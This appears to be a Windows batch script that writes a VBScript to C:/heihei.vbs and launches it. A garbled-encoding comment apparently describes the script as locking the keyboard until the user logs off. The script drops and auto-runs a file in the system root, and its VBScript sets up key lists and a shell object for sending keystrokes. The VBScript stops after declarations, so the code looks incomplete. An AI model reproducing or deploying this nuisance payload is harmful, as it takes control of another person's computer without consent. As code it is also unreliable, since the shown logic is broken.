19
del /f /q "C:/heihei.vbs"
echo Dim^ strKeys^,arrKeys >>C:/heihei.vbs
echo strKeys^ ^=^ ^"A^,B^,C^,D^,E^,F^,G^,^"^_ >>C:/heihei.vbs
echo ^&^ ^"H^,I^,J^,K^,L^,M^,N^,O^,P^,Q^,^"^_ >>C:/heihei.vbs
echo ^&^ ^"R^,S^,T^,U^,V^,W^,X^,Y^,Z^,^"^_ >>C:/heihei.vbs
echo ^&^ ^"1^,2^,3^,4^,5^,6^,7^,8^,9^,0^,^"^_ >>C:/heihei.vbs
echo ^&^ ^"Tab^,Up^,Down^,Left^,Right^,^"^_ >>C:/heihei.vbs
echo ^&^ ^"F1^,F2^,F3^,F4^,F5^,F6^,F7^,^"^_ >>C:/heihei.vbs
echo ^&^ ^"F8^,F9^,F10^,F11^,F12^" >>C:/heihei.vbs
echo arrKeys^ ^=^ Split^(strKeys^,^"^,^"^,^-1^,1^) >>C:/heihei.vbs
echo Dim^ WshShell >>C:/heihei.vbs
echo Set^ WshShell^ ^=^ CreateObject^(^"wscript^.Shell^"^) >>C:/heihei.vbs
echo Dim^ fso >>C:/heihei.vbs
echo Set^ fso^ ^=^ CreateObject^(^"scripting^.filesystemobject^"^) >>C:/heihei.vbs
echo Dim^ desktop >>C:/heihei.vbs
echo desktop^ ^=^ WshShell^.SpecialFolders^(^"Desktop^"^) >>C:/heihei.vbs
echo Dim^ bound^,link^,path >>C:/heihei.vbs
echo bound^ ^=^ UBound^(arrKeys^) >>C:/heihei.vbs
start c:/heihei.vbs




//Ëø¶¨¼üÅÌ£¬×¢Ïú¼´¿É»Ö¸´

